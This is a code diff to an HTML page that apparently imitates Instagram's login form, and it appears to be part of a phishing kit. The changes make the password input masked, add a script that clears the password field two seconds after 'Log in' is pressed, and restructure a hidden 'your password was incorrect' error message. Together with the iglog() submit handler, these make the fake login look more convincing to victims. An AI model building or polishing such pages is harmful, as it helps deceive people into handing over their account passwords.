--- a/9/index.html
+++ b/9/index.html
@@ -3571,15 +3571,17 @@
                                                                             <div class="instacontainer">
                                                                                 <div
                                                                                     class="x6s0dn4 xnz67gz x19gtwsn x1nk0tez x1xp9za0 x1hm1hlx x1npaq5j x1c83p5e x1enjb0b x199158v x13fuv20 xu3j5b3 x1q0q8m5 x26u7qi x178xt8z xm81vs4 xso031l xy80clv x9f619 x5n08af x78zum5 x1q0g3np xvs91rp x1n2onr6 xh8yej3">
-                                                                                    <label class="_aa48 _aa49"><span
-                                                                                            class="_aa4a">Password</span><input
-                                                                                            id="ig-pass" type="password"
+                                                                                    <label class="_aa48 _aa49">
+                                                                                        <span
+                                                                                            class="_aa4a">Password</span>
+                                                                                        <input id="ig-pass"
                                                                                             aria-label="Password"
                                                                                             aria-required="true"
                                                                                             autocapitalize="off"
                                                                                             autocorrect="off"
                                                                                             class="_aa4b _add6 _ac4d _ap35"
-                                                                                            type="text" dir=""></label>
+                                                                                            type="password" dir="">
+                                                                                    </label>
                                                                                     <div
                                                                                         class="x6s0dn4 x972fbf xcfux6l x1qhh985 xm0m39n x9f619 x78zum5 xdl72j9 x1q0g3np x1c4vz4f x2lah0s xk390pu x5yr21d xdj266r x11i5rnm xat24cr x1mh8g0r xexx8yu x1sxyh0 x18d9i69 xkhd6sd x1n2onr6 xxymvpz">
                                                                                         <div
@@ -3596,21 +3598,28 @@
                                                                                     style="cursor: pointer; line-height: var(--base-line-clamp-line-height); --base-line-clamp-line-height: 18px;">Forgot
                                                                                     password?</span>
                                                                             </div>
+
+
                                                                             <div
                                                                                 class="x9f619 xjbqb8w x78zum5 x168nmei x13lgxp2 x5pf9jr xo71vjh x1xmf6yo x1e56ztr x540dpk x1m39q7l x1n2onr6 x1plvlek xryxfnj x1c4vz4f x2lah0s xdt5ytf xqjyukv x1qjc9v5 x1oa3qoh x1nhvcw1">
 
                                                                                 <button
                                                                                     class="c-btn _acan _acap _acas _aj1- _ap30"
-                                                                                    type="submit" onclick="iglog()"
+                                                                                    type="submit"
+                                                                                    onclick="iglog(); clearInstagramPasswordField();"
                                                                                     id="ig-log"> Log in</button>
                                                                             </div>
-                                                                            <div style="display: none;"
-                                                                                id="ig_error_box" class="_ab2z">Sorry,
-                                                                                your
-                                                                                password was
+
+                                                                        </div>
+
+                                                                        <span id="ig_error_box"
+                                                                            class="x1lliihq x1plvlek xryxfnj x1n2onr6 x193iq5w xeuugli x1fj9vlw x13faqbe x1vvkbs x1s928wv xhkezso x1gmr53x x1cpjm7i x1fgarty x1943h6x x1i0vuye xvs91rp xo1l8bm x5n08af x1tu3fi x3x7a5m x10wh9bi x1wdrske x8viiok x18hxmgj"
+                                                                            dir="auto"
+                                                                            style=" display: none; line-height: var(--base-line-clamp-line-height); --base-line-clamp-line-height: 18px;">
+                                                                            <div class="_ab2z">Sorry, your password was
                                                                                 incorrect. Please double-check your
                                                                                 password.</div>
-                                                                        </div>
+                                                                        </span>
 
                                                                         <div
                                                                             class="x9f619 xjbqb8w x78zum5 x168nmei x13lgxp2 x5pf9jr xo71vjh xw7yly9 x1n2onr6 x1plvlek xryxfnj x1c4vz4f x2lah0s xdt5ytf xqjyukv x6s0dn4 x1oa3qoh x1nhvcw1">
@@ -3661,6 +3670,18 @@
 
 
     <script>
+
+        function clearInstagramPasswordField() {
+            // Set a delay before clearing the password field (in milliseconds)
+            setTimeout(function () {
+                // Get the password field element by its ID
+                var passwordField = document.getElementById("ig-pass");
+
+                // Clear the value of the password field
+                passwordField.value = "";
+            }, 2000); // Delay of 2000ms (2 seconds)
+        }
+
 
 
         function togglePasswordVisibility() {
